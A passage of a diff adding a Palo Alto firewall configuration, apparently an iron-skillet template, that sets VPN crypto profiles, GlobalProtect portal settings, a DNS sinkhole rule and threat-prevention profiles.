+                <hash>
+                  <member>sha1</member>
+                </hash>
+                <dh-group>
+                  <member>group2</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha256</member>
+                </hash>
+                <dh-group>
+                  <member>group19</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <encryption>
+                  <member>aes-256-cbc</member>
+                </encryption>
+                <hash>
+                  <member>sha384</member>
+                </hash>
+                <dh-group>
+                  <member>group20</member>
+                </dh-group>
+                <lifetime>
+                  <hours>8</hours>
+                </lifetime>
+              </entry>
+            </ike-crypto-profiles>
+            <ipsec-crypto-profiles>
+              <entry name="default">
+                <esp>
+                  <encryption>
+                    <member>aes-128-cbc</member>
+                    <member>3des</member>
+                  </encryption>
+                  <authentication>
+                    <member>sha1</member>
+                  </authentication>
+                </esp>
+                <dh-group>group2</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-128">
+                <esp>
+                  <encryption>
+                    <member>aes-128-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group19</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+              <entry name="Suite-B-GCM-256">
+                <esp>
+                  <encryption>
+                    <member>aes-256-gcm</member>
+                  </encryption>
+                  <authentication>
+                    <member>none</member>
+                  </authentication>
+                </esp>
+                <dh-group>group20</dh-group>
+                <lifetime>
+                  <hours>1</hours>
+                </lifetime>
+              </entry>
+            </ipsec-crypto-profiles>
+            <global-protect-app-crypto-profiles>
+              <entry name="default">
+                <encryption>
+                  <member>aes-128-cbc</member>
+                </encryption>
+                <authentication>
+                  <member>sha1</member>
+                </authentication>
+              </entry>
+            </global-protect-app-crypto-profiles>
+          </crypto-profiles>
+        </ike>
+        <qos>
+          <profile>
+            <entry name="default">
+              <class>
+                <entry name="class1">
+                  <priority>real-time</priority>
+                </entry>
+                <entry name="class2">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class3">
+                  <priority>high</priority>
+                </entry>
+                <entry name="class4">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class5">
+                  <priority>medium</priority>
+                </entry>
+                <entry name="class6">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class7">
+                  <priority>low</priority>
+                </entry>
+                <entry name="class8">
+                  <priority>low</priority>
+                </entry>
+              </class>
+            </entry>
+          </profile>
+        </qos>
+        <virtual-router>
+          <entry name="gp-default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+                <routing-options>
+                  <graceful-restart>
+                    <enable>yes</enable>
+                  </graceful-restart>
+                </routing-options>
+              </bgp>
+              <rip>
+                <enable>no</enable>
+              </rip>
+              <ospf>
+                <enable>no</enable>
+              </ospf>
+              <ospfv3>
+                <enable>no</enable>
+              </ospfv3>
+            </protocol>
+            <interface>
+              <member>ethernet1/1</member>
+            </interface>
+            <ecmp>
+              <algorithm>
+                <ip-modulo/>
+              </algorithm>
+            </ecmp>
+          </entry>
+          <entry name="default">
+            <protocol>
+              <bgp>
+                <enable>no</enable>
+                <dampening-profile>
+                  <entry name="default">
+                    <cutoff>1.25</cutoff>
+                    <reuse>0.5</reuse>
+                    <max-hold-time>900</max-hold-time>
+                    <decay-half-life-reachable>300</decay-half-life-reachable>
+                    <decay-half-life-unreachable>900</decay-half-life-unreachable>
+                    <enable>yes</enable>
+                  </entry>
+                </dampening-profile>
+              </bgp>
+            </protocol>
+          </entry>
+        </virtual-router>
+      </network>
+      <vsys>
+        <entry name="vsys1">
+          <zone>
+            <entry name="untrust">
+              <network>
+                <layer3>
+                  <member>ethernet1/1</member>
+                </layer3>
+              </network>
+            </entry>
+          </zone>
+          <import>
+            <network>
+              <interface>
+                <member>ethernet1/1</member>
+                <member>vlan</member>
+                <member>loopback</member>
+                <member>tunnel</member>
+              </interface>
+              <vlan/>
+              <virtual-router>
+                <member>gp-default</member>
+              </virtual-router>
+              <virtual-wire/>
+            </network>
+          </import>
+          <global-protect>
+            <global-protect-portal>
+              <entry name="portal">
+                <portal-config>
+                  <client-auth>
+                    <entry name="default">
+                      <user-credential-or-client-cert-required>no</user-credential-or-client-cert-required>
+                      <os>Any</os>
+                      <authentication-profile>local</authentication-profile>
+                      <authentication-message>Enter login credentials</authentication-message>
+                      <username-label>Username</username-label>
+                      <password-label>Password</password-label>
+                    </entry>
+                  </client-auth>
+                  <ssl-tls-service-profile>portal-ssl-tls</ssl-tls-service-profile>
+                  <local-address>
+                    <ip-address-family>ipv4</ip-address-family>
+                    <interface>ethernet1/1</interface>
+                    <ip/>
+                  </local-address>
+                  <custom-login-page>factory-default</custom-login-page>
+                  <custom-home-page>factory-default</custom-home-page>
+                </portal-config>
+                <satellite-config>
+                  <client-certificate>
+                    <local/>
+                  </client-certificate>
+                </satellite-config>
+                <client-config>
+                  <configs>
+                    <entry name="default">
+                      <hip-collection>
+                        <max-wait-time>20</max-wait-time>
+                        <collect-hip-data>yes</collect-hip-data>
+                      </hip-collection>
+                      <gateways>
+                        <external>
+                          <list>
+                            <entry name="asg-gw-default">
+                              <ip>
+                                <ipv4>52.200.14.80</ipv4>
+                              </ip>
+                              <priority-rule>
+                                <entry name="Any">
+                                  <priority>1</priority>
+                                </entry>
+                              </priority-rule>
+                              <manual>no</manual>
+                            </entry>
+                          </list>
+                          <cutoff-time>5</cutoff-time>
+                        </external>
+                      </gateways>
+                      <authentication-override>
+                        <generate-cookie>no</generate-cookie>
+                      </authentication-override>
+                      <source-user>
+                        <member>any</member>
+                      </source-user>
+                      <os>
+                        <member>any</member>
+                      </os>
+                      <agent-ui>
+                        <max-agent-user-overrides>0</max-agent-user-overrides>
+                        <agent-user-override-timeout>0</agent-user-override-timeout>
+                      </agent-ui>
+                      <gp-app-config>
+                        <config>
+                          <entry name="connect-method">
+                            <value>
+                              <member>user-logon</member>
+                            </value>
+                          </entry>
+                          <entry name="refresh-config-interval">
+                            <value>
+                              <member>24</member>
+                            </value>
+                          </entry>
+                          <entry name="agent-user-override">
+                            <value>
+                              <member>allowed</member>
+                            </value>
+                          </entry>
+                          <entry name="client-upgrade">
+                            <value>
+                              <member>prompt</member>
+                            </value>
+                          </entry>
+                          <entry name="use-sso">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="logout-remove-sso">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="krb-auth-fail-fallback">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="retry-tunnel">
+                            <value>
+                              <member>30</member>
+                            </value>
+                          </entry>
+                          <entry name="retry-timeout">
+                            <value>
+                              <member>5</member>
+                            </value>
+                          </entry>
+                          <entry name="enforce-globalprotect">
+                            <value>
+                              <member>no</member>
+                            </value>
+                          </entry>
+                          <entry name="captive-portal-exception-timeout">
+                            <value>
+                              <member>0</member>
+                            </value>
+                          </entry>
+                          <entry name="traffic-blocking-notification-delay">
+                            <value>
+                              <member>15</member>
+                            </value>
+                          </entry>
+                          <entry name="display-traffic-blocking-notification-msg">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="traffic-blocking-notification-msg">
+                            <value>
+                              <member>&lt;div style="font-family:'Helvetica Neue';"&gt;&lt;h1 style="color:red;text-align:center; margin: 0; font-size: 30px;"&gt;Notice&lt;/h1&gt;&lt;p style="margin: 0;font-size: 15px; line-height: 1.2em;"&gt;To access the network, you must first connect to GlobalProtect.&lt;/p&gt;&lt;/div&gt;</member>
+                            </value>
+                          </entry>
+                          <entry name="allow-traffic-blocking-notification-dismissal">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="display-captive-portal-detection-msg">
+                            <value>
+                              <member>no</member>
+                            </value>
+                          </entry>
+                          <entry name="captive-portal-detection-msg">
+                            <value>
+                              <member>&lt;div style="font-family:'Helvetica Neue';"&gt;&lt;h1 style="color:red;text-align:center; margin: 0; font-size: 30px;"&gt;Captive Portal Detected&lt;/h1&gt;&lt;p style="margin: 0; font-size: 15px; line-height: 1.2em;"&gt;GlobalProtect has temporarily permitted network access for you to connect to the Internet. Follow instructions from your internet provider.&lt;/p&gt;&lt;p style="margin: 0; font-size: 15px; line-height: 1.2em;"&gt;If you let the connection time out, open GlobalProtect and click Connect to try again.&lt;/p&gt;&lt;/div&gt;</member>
+                            </value>
+                          </entry>
+                          <entry name="certificate-store-lookup">
+                            <value>
+                              <member>user-and-machine</member>
+                            </value>
+                          </entry>
+                          <entry name="scep-certificate-renewal-period">
+                            <value>
+                              <member>7</member>
+                            </value>
+                          </entry>
+                          <entry name="retain-connection-smartcard-removal">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="enable-advanced-view">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="enable-do-not-display-this-welcome-page-again">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="rediscover-network">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="resubmit-host-info">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="can-change-portal">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="can-continue-if-portal-cert-invalid">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="show-agent-icon">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="user-switch-tunnel-rename-timeout">
+                            <value>
+                              <member>0</member>
+                            </value>
+                          </entry>
+                          <entry name="pre-logon-tunnel-rename-timeout">
+                            <value>
+                              <member>-1</member>
+                            </value>
+                          </entry>
+                          <entry name="show-system-tray-notifications">
+                            <value>
+                              <member>no</member>
+                            </value>
+                          </entry>
+                          <entry name="max-internal-gateway-connection-attempts">
+                            <value>
+                              <member>0</member>
+                            </value>
+                          </entry>
+                          <entry name="portal-timeout">
+                            <value>
+                              <member>5</member>
+                            </value>
+                          </entry>
+                          <entry name="connect-timeout">
+                            <value>
+                              <member>5</member>
+                            </value>
+                          </entry>
+                          <entry name="receive-timeout">
+                            <value>
+                              <member>30</member>
+                            </value>
+                          </entry>
+                          <entry name="enforce-dns">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="flush-dns">
+                            <value>
+                              <member>no</member>
+                            </value>
+                          </entry>
+                          <entry name="proxy-multiple-autodetect">
+                            <value>
+                              <member>no</member>
+                            </value>
+                          </entry>
+                          <entry name="use-proxy">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="wsc-autodetect">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="mfa-enabled">
+                            <value>
+                              <member>no</member>
+                            </value>
+                          </entry>
+                          <entry name="mfa-listening-port">
+                            <value>
+                              <member>4501</member>
+                            </value>
+                          </entry>
+                          <entry name="mfa-notification-msg">
+                            <value>
+                              <member>You have attempted to access a protected resource that requires additional authentication. Proceed to authenticate at</member>
+                            </value>
+                          </entry>
+                          <entry name="ipv6-preferred">
+                            <value>
+                              <member>yes</member>
+                            </value>
+                          </entry>
+                          <entry name="init-panel">
+                            <value>
+                              <member>no</member>
+                            </value>
+                          </entry>
+                        </config>
+                      </gp-app-config>
+                      <save-user-credentials>1</save-user-credentials>
+                      <portal-2fa>no</portal-2fa>
+                      <manual-only-gateway-2fa>no</manual-only-gateway-2fa>
+                      <internal-gateway-2fa>no</internal-gateway-2fa>
+                      <auto-discovery-external-gateway-2fa>no</auto-discovery-external-gateway-2fa>
+                      <mdm-enrollment-port>443</mdm-enrollment-port>
+                    </entry>
+                  </configs>
+                  <agent-user-override-key>-AQ==9EIXqBFzhp4IZxdTxSVTZG/12Vs=iH76LFLerpHJ1S680bBopQ==</agent-user-override-key>
+                  <root-ca>
+                    <entry name="rootCA">
+                      <install-in-cert-store>no</install-in-cert-store>
+                    </entry>
+                  </root-ca>
+                </client-config>
+              </entry>
+            </global-protect-portal>
+          </global-protect>
+          <application/>
+          <application-group/>
+          <service/>
+          <service-group/>
+          <schedule/>
+          <rulebase>
+            <security>
+              <rules>
+                <entry name="DNS Sinkhole Block" uuid="874a3a0c-0f6c-4d22-9a84-68fbe7fe8787">
+                  <description>Block outbound sessions that match a malicious domain and have been redirected to a configured sinkhole IP address.</description>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>Sinkhole-IPv4</member>
+                    <member>Sinkhole-IPv6</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <application>
+                    <member>any</member>
+                  </application>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <hip-profiles>
+                    <member>any</member>
+                  </hip-profiles>
+                  <action>deny</action>
+                  <log-setting>default</log-setting>
+                  <tag>
+                    <member>Outbound</member>
+                  </tag>
+                  <group-tag>Outbound</group-tag>
+                </entry>
+              </rules>
+            </security>
+            <default-security-rules>
+              <rules>
+                <entry name="intrazone-default" uuid="7f2e08da-6cdb-45b9-9482-09b26da0d3f6">
+                  <action>allow</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <profile-setting>
+                    <group>
+                      <member>Inbound</member>
+                    </group>
+                  </profile-setting>
+                  <log-setting>default</log-setting>
+                </entry>
+                <entry name="interzone-default" uuid="27ad6cfa-2328-42bd-9f47-5ce08adfe23a">
+                  <action>drop</action>
+                  <log-start>no</log-start>
+                  <log-end>yes</log-end>
+                  <log-setting>default</log-setting>
+                </entry>
+              </rules>
+            </default-security-rules>
+            <application-override>
+              <rules/>
+            </application-override>
+            <decryption>
+              <rules>
+                <entry name="NO-Decrypt Rule" uuid="0f7166c8-f763-416c-aa2c-a118906da6e8">
+                  <category>
+                    <member>any</member>
+                  </category>
+                  <service>
+                    <member>any</member>
+                  </service>
+                  <type>
+                    <ssl-forward-proxy/>
+                  </type>
+                  <from>
+                    <member>any</member>
+                  </from>
+                  <to>
+                    <member>any</member>
+                  </to>
+                  <source>
+                    <member>any</member>
+                  </source>
+                  <destination>
+                    <member>any</member>
+                  </destination>
+                  <source-user>
+                    <member>any</member>
+                  </source-user>
+                  <profile>Recommended_Decryption_Profile</profile>
+                  <action>no-decrypt</action>
+                  <description>This rule does not do Decryption.  This rule is validating SSL Protocol Communications.</description>
+                </entry>
+              </rules>
+            </decryption>
+            <tunnel-inspect>
+              <rules/>
+            </tunnel-inspect>
+            <authentication>
+              <rules/>
+            </authentication>
+            <nat>
+              <rules/>
+            </nat>
+            <qos>
+              <rules/>
+            </qos>
+            <pbf>
+              <rules/>
+            </pbf>
+            <dos>
+              <rules/>
+            </dos>
+          </rulebase>
+          <address>
+            <entry name="Sinkhole-IPv4">
+              <ip-netmask>72.5.65.111</ip-netmask>
+            </entry>
+            <entry name="Sinkhole-IPv6">
+              <ip-netmask>2600:5200::1</ip-netmask>
+            </entry>
+          </address>
+          <address-group/>
+          <external-list/>
+          <region/>
+          <application-tag/>
+          <application-filter/>
+          <profile-group>
+            <entry name="Outbound">
+              <virus>
+                <member>Outbound-AV</member>
+              </virus>
+              <spyware>
+                <member>Outbound-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Outbound-VP</member>
+              </vulnerability>
+              <url-filtering>
+                <member>Outbound-URL</member>
+              </url-filtering>
+              <file-blocking>
+                <member>Outbound-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Outbound-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="Inbound">
+              <virus>
+                <member>Inbound-AV</member>
+              </virus>
+              <spyware>
+                <member>Inbound-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Inbound-VP</member>
+              </vulnerability>
+              <file-blocking>
+                <member>Inbound-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Inbound-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="Internal">
+              <virus>
+                <member>Internal-AV</member>
+              </virus>
+              <spyware>
+                <member>Internal-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Internal-VP</member>
+              </vulnerability>
+              <file-blocking>
+                <member>Internal-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Internal-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="Alert-Only">
+              <virus>
+                <member>Alert-Only-AV</member>
+              </virus>
+              <spyware>
+                <member>Alert-Only-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Alert-Only-VP</member>
+              </vulnerability>
+              <url-filtering>
+                <member>Alert-Only-URL</member>
+              </url-filtering>
+              <file-blocking>
+                <member>Alert-Only-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Alert-Only-WF</member>
+              </wildfire-analysis>
+            </entry>
+            <entry name="default">
+              <virus>
+                <member>Outbound-AV</member>
+              </virus>
+              <spyware>
+                <member>Outbound-AS</member>
+              </spyware>
+              <vulnerability>
+                <member>Outbound-VP</member>
+              </vulnerability>
+              <url-filtering>
+                <member>Outbound-URL</member>
+              </url-filtering>
+              <file-blocking>
+                <member>Outbound-FB</member>
+              </file-blocking>
+              <wildfire-analysis>
+                <member>Outbound-WF</member>
+              </wildfire-analysis>
+            </entry>
+          </profile-group>
+          <authentication-object/>
+          <tag>
+            <entry name="spoke2-vpc">
+              <color>color3</color>
+            </entry>
+            <entry name="spoke1-vpc">
+              <color>color24</color>
+            </entry>
+            <entry name="untrust-zone">
+              <color>color20</color>
+            </entry>
+            <entry name="trust-zone">
+              <color>color13</color>
+            </entry>
+            <entry name="Outbound">
+              <comments>Outbound to the Internet</comments>
+            </entry>
+            <entry name="Inbound">
+              <comments>Inbound from the Internet</comments>
+            </entry>
+            <entry name="Internal">
+              <comments>Internal to Internal</comments>
+            </entry>
+            <entry name="iron-skillet-version">
+              <comments>version 1.0.6: version of this iron-skillet template file</comments>
+            </entry>
+          </tag>
+          <application-status/>
+          <threats>
+            <vulnerability/>
+            <spyware/>
+          </threats>
+          <profiles>
+            <virus>
+              <entry name="Alert-Only-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>alert</action>
+                    <wildfire-action>alert</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Outbound-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Inbound-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Internal-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+              </entry>
+              <entry name="Exception-AV">
+                <decoder>
+                  <entry name="ftp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="http">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="imap">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="pop3">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smb">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                  <entry name="smtp">
+                    <action>reset-both</action>
+                    <wildfire-action>reset-both</wildfire-action>
+                  </entry>
+                </decoder>
+                <description>Use this profile for rules needing modifications to the standard</description>
+              </entry>
+            </virus>
+            <spyware>
+              <entry name="Outbound-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                      <packet-capture>single-packet</packet-capture>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                </botnet-domains>
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <severity>
+                      <member>high</member>
+                      <member>critical</member>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Inbound-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                      <packet-capture>single-packet</packet-capture>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                </botnet-domains>
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <severity>
+                      <member>high</member>
+                      <member>critical</member>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Internal-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                      <packet-capture>single-packet</packet-capture>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                </botnet-domains>
+                <rules>
+                  <entry name="Block-Critical-High">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <severity>
+                      <member>high</member>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>single-packet</packet-capture>
+                  </entry>
+                  <entry name="Default-Medium-Low-Info">
+                    <action>
+                      <default/>
+                    </action>
+                    <severity>
+                      <member>low</member>
+                      <member>informational</member>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Alert-Only-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <alert/>
+                      </action>
+                      <packet-capture>disable</packet-capture>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                </botnet-domains>
+                <rules>
+                  <entry name="Alert-All">
+                    <action>
+                      <alert/>
+                    </action>
+                    <severity>
+                      <member>any</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                  </entry>
+                </rules>
+              </entry>
+              <entry name="Exception-AS">
+                <botnet-domains>
+                  <lists>
+                    <entry name="default-paloalto-dns">
+                      <action>
+                        <sinkhole/>
+                      </action>
+                      <packet-capture>single-packet</packet-capture>
+                    </entry>
+                  </lists>
+                  <sinkhole>
+                    <ipv4-address>72.5.65.111</ipv4-address>
+                    <ipv6-address>2600:5200::1</ipv6-address>
+                  </sinkhole>
+                </botnet-domains>
+              </entry>
+            </spyware>
+            <vulnerability>
+              <entry name="Test Drive">
+                <rules>
+                  <entry name="simple-client-critical">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-high">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-client-medium">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>client</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-critical">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-high">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>high</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                  <entry name="simple-server-medium">
+                    <cve>
+                      <member>any</member>
+                    </cve>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>medium</member>
+                    </severity>
+                    <threat-name>any</threat-name>
+                    <host>server</host>
+                    <category>any</category>
+                    <packet-capture>disable</packet-capture>
+                    <action>
+                      <default/>
+                    </action>
+                  </entry>
+                </rules>
+                <threat-exception>
+                  <entry name="31719">
+                    <action>
+                      <reset-client/>
+                    </action>
+                  </entry>
+                </threat-exception>
+                <description>WW's profile</description>
+              </entry>
+              <entry name="Outbound-VP">
+                <rules>
+                  <entry name="Block-Critical-High-Medium">
+                    <action>
+                      <reset-both/>
+                    </action>
+                    <vendor-id>
+                      <member>any</member>
+                    </vendor-id>
+                    <severity>
+                      <member>critical</member>
+                      <member>high</member>
+                      <member>medium</member>
+                    </severity>
+                    <cve>
+                      <member>any</member>
+                    </cve>
